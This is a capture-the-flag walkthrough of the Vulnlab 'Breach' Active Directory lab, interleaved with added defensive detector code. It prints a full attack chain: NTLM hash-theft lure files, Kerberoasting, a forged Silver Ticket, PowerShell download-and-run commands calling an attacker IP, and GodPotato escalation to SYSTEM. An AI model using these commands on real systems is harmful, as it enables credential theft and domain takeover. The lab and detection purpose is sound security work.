VL-Breach

Initial Enumeration

NMAP Scan Results

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-17 15:22:18Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.109.252:1433:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
|_ Product_Version: 10.0.20348
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
| smb2-time:
| date: 2025-03-17T15:22:26
|_ start_date: N/A
|_clock-skew: mean: -1h59m59s, deviation: 0s, median: -1h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

User Access

Enumerating Shares

First, let’s check for available SMB shares using the guest account:

netexec smb 10.10.109.252 -u 'guest' -p '' --shares

Available SMB Shares
Next, let’s connect to the “share” using the guest account:

smbclient //10.10.109.252/share -U 'guest'

Potential Users
We found several potential users:

claire.pope
diana.pope
julia.wong

NTLM Hash Capture

We used ntlm_theft (https://github.com/Greenwolf/ntlm_theft) to generate lure files that, when a user merely opens the folder or the file, make their machine authenticate to our host over SMB and leak that user's Net-NTLMv2 response:

python3 ntlm_theft.py -g all -s <your ip> -f invoice

After creating these files, we connected to the SMB share and uploaded them to all accessible folders:

smbclient //10.10.126.89/share -U 'guest'
mput *

Then we started Responder to capture any callbacks:

sudo responder -I tun0 -dwv

Julia Wong Hash Capture
We saved the hash and cracked it using hashcat:

hashcat hash55.txt /usr/share/wordlists/rockyou.txt
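A defender's counterpart to the lure-planting step above, added here and not part of the original write-up: a scanner for a writable share that flags files whose auto-resolved fields (IconFile in .url and .scf, IconResource in desktop.ini) point at a UNC host outside an allow-list of known file servers. The sample files, the lure host 10.8.5.195 and the allow-list entry are constructed.

```python
"""Flag files in a share whose auto-resolved fields point at a UNC path on a
host that is not one of our own file servers (the pattern ntlm_theft lures use).
Added example, not part of the original write-up; sample files are constructed."""
import re
from pathlib import Path

UNC = re.compile(rb"\\\\([\w.-]+)\\[^\s<>]+")   # \\host\path, host = IP or DNS name
# Per extension, the ini-style keys Explorer dereferences as soon as the folder is
# listed (no click needed). Binary formats such as .lnk would need a real parser.
AUTO_FIELDS = {
    ".url": (b"IconFile=",),
    ".scf": (b"IconFile=",),
    ".ini": (b"IconResource=",),   # desktop.ini
}

def find_lures(name, data, internal_hosts=()):
    """Return sorted external UNC hosts referenced from auto-resolved fields."""
    fields = AUTO_FIELDS.get(Path(name).suffix.lower())
    if not fields:
        return []
    allow = {h.lower() for h in internal_hosts}
    hits = set()
    for m in UNC.finditer(data):
        key = data[data.rfind(b"\n", 0, m.start()) + 1:m.start()].strip()
        host = m.group(1).decode(errors="replace")
        if any(key.startswith(f) for f in fields) and host.lower() not in allow:
            hits.add(host)
    return sorted(hits)

def scan_share(root, internal_hosts=()):
    """Walk a mounted share; map relative path -> hosts it would leak credentials to."""
    root, findings = Path(root), {}
    for p in root.rglob("*"):
        if p.is_file():
            hosts = find_lures(p.name, p.read_bytes(), internal_hosts)
            if hosts:
                findings[str(p.relative_to(root))] = hosts
    return findings

# Constructed samples: two lures pointing at an outside IP, one legitimate
# desktop.ini pointing at the DC's NETLOGON share, and a plain text file.
SAMPLES = {
    "invoice.url": b"[InternetShortcut]\r\nURL=https://intranet.breach.vl/\r\n"
                   b"IconFile=\\\\10.8.5.195\\share\\invoice.ico\r\nIconIndex=1\r\n",
    "invoice.scf": b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.8.5.195\\share\\invoice.ico\r\n"
                   b"[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "desktop.ini": b"[.ShellClassInfo]\r\nIconResource=\\\\breachdc.breach.vl\\netlogon\\corp.ico,0\r\n",
    "readme.txt": b"see \\\\10.8.5.195\\share for details\r\n",
}
```

Run scan_share() against a mounted copy of the share on a schedule; a guest-writable share that returns any finding is the real fix target, since removing write access for guest stops the technique entirely.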

Accessing Julia Wong’s Files

Now that we have Julia Wong’s credentials, we logged back into the share:

smbclient //10.10.126.89/share -U 'julia.wong'

Local User Flag
This is where we found the user flag.

Privilege Escalation

BloodHound Enumeration

To get a better understanding of the Active Directory environment, we used BloodHound:

netexec ldap 10.10.126.89 -u 'julia.wong' -p 'Computer1'  --bloodhound --dns-server 10.10.126.89 -c All --dns-tcp

Inside BloodHound, we identified a Kerberoastable service account, SVC_MSSQL@BREACH.VL. We decided to target this account for our lateral movement.

Kerberoasting

We requested a service ticket for the account so that its hash could be cracked offline:

impacket-GetUserSPNs -dc-ip 10.10.126.89 -request breach.vl/julia.wong:'<PASSWORD>'

Initially, we encountered a clock skew error: KRB_AP_ERR_SKEW(Clock skew too great). Kerberos rejects requests whose timestamp is too far from the KDC's clock (five minutes by default), and the nmap output had already shown the target running about two hours off from ours. To fix this, we synchronized our time with the target system:

sudo timedatectl set-ntp off
sudo rdate -n [IP of Target]

Then we ran GetUserSPNs again:
SQL Service Hash
We cracked the hash using hashcat:

hashcat hash56.txt /usr/share/wordlists/rockyou.txt

This gave us the password for the MSSQL service account.
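Added detection example, not from the write-up: the GetUserSPNs request above leaves a 4769 on the DC with Ticket Encryption Type 0x17 (RC4) for a user-account SPN, which is the standard Kerberoasting indicator. The events, requester names and IPs below are constructed in the shape a SIEM parses them into; the mitigation is to restrict accounts like svc_mssql to AES via msDS-SupportedEncryptionTypes and give them long random or gMSA passwords.

```python
"""Flag Kerberoasting candidates in Security log 4769 (TGS request) events:
a successful request for a user account's SPN issued with an RC4 ticket, which
is what GetUserSPNs -request obtains by default. Added example, not from the
write-up; the events below are constructed as a SIEM would parse them."""
from collections import defaultdict

RC4_TYPES = {"0x17", "0x18"}          # RC4-HMAC, RC4-HMAC-EXP

def is_kerberoast_candidate(ev):
    """True for a successful 4769 naming a user (not computer) service account
    whose ticket was issued with RC4."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$"):              # computer accounts: not what roasting targets
        return False
    return ev.get("TicketEncryptionType", "").lower() in RC4_TYPES

def roast_report(events, min_services=1):
    """Map requester -> sorted RC4-issued service accounts, keeping requesters
    that touched at least `min_services` distinct accounts (a tool-driven sweep
    usually hits every roastable SPN within seconds)."""
    seen = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            seen[ev["TargetUserName"].lower()].add(ev["ServiceName"].lower())
    return {u: sorted(s) for u, s in seen.items() if len(s) >= min_services}

# Constructed events modelled on this box: julia.wong pulls an RC4 ticket for
# svc_mssql; an AES ticket for the DC's own account and an old workstation
# (constructed name WS01$) using RC4 for a computer SPN are normal noise.
EVENTS = [
    {"EventID": 4769, "Status": "0x0", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.8.5.195"},
    {"EventID": 4769, "Status": "0x0", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "BREACHDC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.8.5.195"},
    {"EventID": 4769, "Status": "0x0", "TargetUserName": "WS01$@BREACH.VL",
     "ServiceName": "BREACHDC$", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.50"},
    {"EventID": 4769, "Status": "0x1B", "TargetUserName": "julia.wong@BREACH.VL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.8.5.195"},
]
```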

MSSQL Access

We connected to the MSSQL server using the service account:

impacket-mssqlclient svc_mssql:Trustno1@10.10.126.89

We attempted to enable command execution but encountered permission issues:

ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

Silver Ticket Attack

Since svc_mssql could not enable xp_cmdshell itself but we held that account's password, we forged a Silver Ticket: a service ticket for the MSSQL SPN that is encrypted with the service account's own key, so SQL Server accepts whatever identity we put in it without the domain controller ever being consulted:

  1. First, we converted the service account password to an NT hash using an online tool: https://www.browserling.com/tools/ntlm-hash

  2. Next, we needed the domain SID:

    lookupsid.py 'breach.vl/svc_mssql@10.10.126.89' 0
    Domain SID is: S-1-5-21-2330692793-3312915120-706255856
  3. We created the Silver Ticket using ticketer:

    impacket-ticketer -nthash <> -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
    export KRB5CCNAME=administrator.ccache
  4. We used the Silver Ticket to connect to MSSQL as administrator:

    impacket-mssqlclient -k breachdc.breach.vl
    enable_xp_cmdshell
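Added detection example, not from the write-up: because a Silver Ticket is forged offline, no DC logs a 4769 for it, yet the service host (here the DC itself, since MSSQL runs on BREACHDC) records a Kerberos network logon (4624, LogonType 3) for the impersonated user. The code correlates the two event types; every event, timestamp and IP below is constructed.

```python
"""Spot service logons backed by a ticket the KDC never issued (Silver Ticket):
a Kerberos network logon (4624, LogonType 3) on the service host with no
successful 4769 for that account on any DC within the preceding ticket lifetime.
Added example, not from the write-up; the events below are constructed."""
from datetime import datetime, timedelta

TICKET_LIFETIME = timedelta(hours=10)   # default MaxServiceTicketAge; tickets are cached

def _ts(ev):
    return datetime.fromisoformat(ev["Time"])

def _user(name):
    """'julia.wong@BREACH.VL' and 'julia.wong' compare equal."""
    return name.split("@")[0].lower()

def unrequested_kerberos_logons(events, lifetime=TICKET_LIFETIME):
    """Return (time, account, source IP) for 4624 Kerberos network logons that
    no DC-side 4769 within `lifetime` can account for."""
    issued = [(_ts(e), _user(e["TargetUserName"]))
              for e in events if e.get("EventID") == 4769 and e.get("Status") == "0x0"]
    flagged = []
    for e in events:
        if e.get("EventID") != 4624 or e.get("LogonType") != 3 \
                or e.get("AuthenticationPackageName") != "Kerberos":
            continue
        t, acct = _ts(e), _user(e["TargetUserName"])
        if not any(u == acct and t - lifetime <= when <= t for when, u in issued):
            flagged.append((e["Time"], e["TargetUserName"], e.get("IpAddress")))
    return flagged

# Constructed: julia.wong legitimately obtains a ticket for the DC and logs on;
# "administrator" then logs on to the DC over Kerberos with no 4769 anywhere.
EVENTS = [
    {"EventID": 4769, "Time": "2025-03-17T15:30:00", "Status": "0x0",
     "TargetUserName": "julia.wong@BREACH.VL", "ServiceName": "BREACHDC$"},
    {"EventID": 4624, "Time": "2025-03-17T15:30:05", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "julia.wong",
     "TargetDomainName": "BREACH", "IpAddress": "10.8.5.195"},
    {"EventID": 4624, "Time": "2025-03-17T16:02:11", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "administrator",
     "TargetDomainName": "BREACH", "IpAddress": "10.8.5.195"},
    {"EventID": 4624, "Time": "2025-03-17T16:05:00", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "guest",
     "TargetDomainName": "BREACHDC", "IpAddress": "10.8.5.195"},
]
```

In production the 4769 feed must cover every domain controller and the window must exceed the configured service-ticket lifetime, otherwise legitimate cached tickets produce false positives.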

Getting a Reverse Shell

Our initial attempt to get a reverse shell was flagged as malicious:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/Invoke-ConPtyShell.ps1''); Invoke-ConPtyShell 10.8.5.195 3001"';

We found an alternative payload that worked:

EXEC xp_cmdshell 'powershell -ep bypass -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.8.5.195:8080/maybe.ps1'')"';

Initial Shell

Privilege Escalation to SYSTEM

Impersonation Privileges
Since the account we landed as held impersonation privileges (SeImpersonatePrivilege), we used GodPotato to escalate to SYSTEM: https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

./God.exe -cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoProfile -Command  IEX (New-Object Net.WebClient).DownloadString('http://10.8.5.195:8080/maybe.ps1')"

We modified our maybe.ps1 script and set up a listener:

nc -lvnp 4444

Admin Shell

https://api.vulnlab.com/api/v1/share?id=c3140301-21e1-4913-99b2-b635726c0e21